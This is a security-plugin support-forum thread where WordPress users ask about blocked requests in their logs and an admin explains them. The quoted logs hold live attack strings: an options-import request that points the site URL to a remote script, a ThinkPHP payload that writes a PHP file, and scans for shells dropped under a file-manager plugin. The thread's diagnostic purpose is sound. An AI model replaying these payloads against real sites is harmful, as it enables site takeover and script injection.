Security Log Event Codes

Home Forums BulletProof Security Pro Security Log Event Codes

Viewing 7 posts - 76 through 82 (of 82 total)
  • Author
    Posts
  • #35544
    Bub
    Participant

    Done and done…. Thanks. This topic should now be closed.

    #35545
    Bub
    Participant

    Again, thanks.

    #37723
    sergeykar
    Participant

    I have been seeing this frequently in my security log – and it appears like a hack attempt – not sure what it is because I have not seen this in the past. It appears BPS is doing it’s job – however is there a weakness this attempt is trying to exploit?

    [403 GET Request: 06.08.2019 - 10:15]
    BPS: 3.5
    WP: 5.2.2
    Event Code: WPADMIN-SBR
    Solution: https://forum.ait-pro.com/forums/topic/security-log-event-codes/
    REMOTE_ADDR: 159.69.154.78
    Host Name: static.78.154.69.159.clients.your-server.de
    SERVER_PROTOCOL: HTTP/1.1
    HTTP_CLIENT_IP:
    HTTP_FORWARDED:
    HTTP_X_FORWARDED_FOR:
    HTTP_X_CLUSTER_CLIENT_IP:
    REQUEST_METHOD: GET
    HTTP_REFERER:
    REQUEST_URI: /wp-admin/admin-ajax.php?nd_options_value_import_settings=siteurl[nd_options_option_value]https://jackielovedogs.com/pret.js?l=1&[nd_options_end_option]
    QUERY_STRING: nd_options_value_import_settings=siteurl[nd_options_option_value]https://jackielovedogs.com/pret.js?l=1&[nd_options_end_option]
    HTTP_USER_AGENT: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36
    #37724
    AITpro Admin
    Keymaster

    This is either a probe looking for existing injected hacker code in your website’s Source Code or a hacker trying to exploit an existing hack injection on your website’s Source Code.  To check if your website is hacked do the steps below:

    1. Go to your website’s home page.
    2. Right mouse click and click View page source (google chrome) or a similar command for other Browsers.
    3. Use your Browser’s Find… command (google chrome – located under settings > Find…) and enter this search string:  nd_options
    4. If you see/find Source Code that looks like this below then your website is hacked.
    5. Let me know if your Browser Find/Search finds any search results or not.

    httx://expat.ca/?s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars%5B0%5D=file_put_contents&vars%5B1%5D%5B%5D=jfjvc.php&vars%5B1%5D%5B%5D=%3C?php%20mb_ereg_replace(, httx://expat.ca/jfjvc.php, httx://expat.ca/wp-admin/admin-ajax.php?nd_options_value_import_settings=siteurl[nd_options_option_value]httxs://jackielovedogs.com/pret.js?l=1&[nd_options_end_option], httx://expat.ca/wp-admin/admin-post.phpnd_options_value_import_settings=home[nd_options_option_value]httxs://jackielovedogs.com/pret?l=1&[nd_options_end_option],
    #39337
    Chris Moon
    Participant

    Found this in my Security Log and not sure what it mens:

    [403 GET Request: September 19, 2020 - 23:57]
    BPS Pro: 14.8
    WP: 5.5.1
    Event Code: PFWR-PSBR-HPRA
    Solution: https://forum.ait-pro.com/forums/topic/security-log-event-codes/
    REMOTE_ADDR: GDPR Compliance On
    Host Name: ns4.transcomag.net
    SERVER_PROTOCOL: HTTP/1.1
    HTTP_CLIENT_IP: GDPR Compliance On
    HTTP_FORWARDED: GDPR Compliance On
    HTTP_X_FORWARDED_FOR: GDPR Compliance On
    HTTP_X_CLUSTER_CLIENT_IP: GDPR Compliance On
    REQUEST_METHOD: GET
    HTTP_REFERER:
    REQUEST_URI: /wp-content/plugins/wp-file-manager/lib/files/n.php
    QUERY_STRING:
    HTTP_USER_AGENT: Mozilla
    
    [403 GET Request: September 19, 2020 - 23:57]
    BPS Pro: 14.8
    WP: 5.5.1
    Event Code: PFWR-PSBR-HPRA
    Solution: https://forum.ait-pro.com/forums/topic/security-log-event-codes/
    REMOTE_ADDR: GDPR Compliance On
    Host Name: ns4.transcomag.net
    SERVER_PROTOCOL: HTTP/1.1
    HTTP_CLIENT_IP: GDPR Compliance On
    HTTP_FORWARDED: GDPR Compliance On
    HTTP_X_FORWARDED_FOR: GDPR Compliance On
    HTTP_X_CLUSTER_CLIENT_IP: GDPR Compliance On
    REQUEST_METHOD: GET
    HTTP_REFERER:
    REQUEST_URI: /wp-content/plugins/wp-file-manager/lib/files/accesson.php
    QUERY_STRING:
    HTTP_USER_AGENT: Mozilla
    
    [403 GET Request: September 19, 2020 - 23:57]
    BPS Pro: 14.8
    WP: 5.5.1
    Event Code: PFWR-PSBR-HPRA
    Solution: https://forum.ait-pro.com/forums/topic/security-log-event-codes/
    REMOTE_ADDR: GDPR Compliance On
    Host Name: ns4.transcomag.net
    SERVER_PROTOCOL: HTTP/1.1
    HTTP_CLIENT_IP: GDPR Compliance On
    HTTP_FORWARDED: GDPR Compliance On
    HTTP_X_FORWARDED_FOR: GDPR Compliance On
    HTTP_X_CLUSTER_CLIENT_IP: GDPR Compliance On
    REQUEST_METHOD: GET
    HTTP_REFERER:
    REQUEST_URI: /wp-content/plugins/wp-file-manager/lib/files/upload.php
    QUERY_STRING:
    HTTP_USER_AGENT: Mozilla
    
    [403 GET Request: September 19, 2020 - 23:57]
    BPS Pro: 14.8
    WP: 5.5.1
    Event Code: PFWR-PSBR-HPRA
    Solution: https://forum.ait-pro.com/forums/topic/security-log-event-codes/
    REMOTE_ADDR: GDPR Compliance On
    Host Name: ns4.transcomag.net
    SERVER_PROTOCOL: HTTP/1.1
    HTTP_CLIENT_IP: GDPR Compliance On
    HTTP_FORWARDED: GDPR Compliance On
    HTTP_X_FORWARDED_FOR: GDPR Compliance On
    HTTP_X_CLUSTER_CLIENT_IP: GDPR Compliance On
    REQUEST_METHOD: GET
    HTTP_REFERER:
    REQUEST_URI: /wp-content/plugins/wp-file-manager/lib/files/thumbs.php
    QUERY_STRING:
    HTTP_USER_AGENT: Mozilla
    
    [403 GET Request: September 19, 2020 - 23:57]
    BPS Pro: 14.8
    WP: 5.5.1
    Event Code: PFWR-PSBR-HPRA
    Solution: https://forum.ait-pro.com/forums/topic/security-log-event-codes/
    REMOTE_ADDR: GDPR Compliance On
    Host Name: ns4.transcomag.net
    SERVER_PROTOCOL: HTTP/1.1
    HTTP_CLIENT_IP: GDPR Compliance On
    HTTP_FORWARDED: GDPR Compliance On
    HTTP_X_FORWARDED_FOR: GDPR Compliance On
    HTTP_X_CLUSTER_CLIENT_IP: GDPR Compliance On
    REQUEST_METHOD: GET
    HTTP_REFERER:
    REQUEST_URI: /wp-content/plugins/wp-file-manager/lib/files/x.php
    QUERY_STRING:
    HTTP_USER_AGENT: Mozilla
    
    [403 GET Request: September 19, 2020 - 23:57]
    BPS Pro: 14.8
    WP: 5.5.1
    Event Code: PFWR-PSBR-HPRA
    Solution: https://forum.ait-pro.com/forums/topic/security-log-event-codes/
    REMOTE_ADDR: GDPR Compliance On
    Host Name: ns4.transcomag.net
    SERVER_PROTOCOL: HTTP/1.1
    HTTP_CLIENT_IP: GDPR Compliance On
    HTTP_FORWARDED: GDPR Compliance On
    HTTP_X_FORWARDED_FOR: GDPR Compliance On
    HTTP_X_CLUSTER_CLIENT_IP: GDPR Compliance On
    REQUEST_METHOD: GET
    HTTP_REFERER:
    REQUEST_URI: /wp-content/plugins/quiz-master-next/js/admin.js
    QUERY_STRING:
    HTTP_USER_AGENT: Mozilla
    #39338
    AITpro Admin
    Keymaster

    @ Chris Moon – These are typical hacker recon/searches for known plugins with security vulnerabilities.  The BPS Pro Plugin Firewall protects all plugin files in the WordPress /plugins/ folder.  So these recons/searches were blocked by the BPS Pro Plugin Firewall.

    #39340
    Chris Moon
    Participant

    Thanks Ed, that’s reassuring.

Viewing 7 posts - 76 through 82 (of 82 total)
  • You must be logged in to reply to this topic.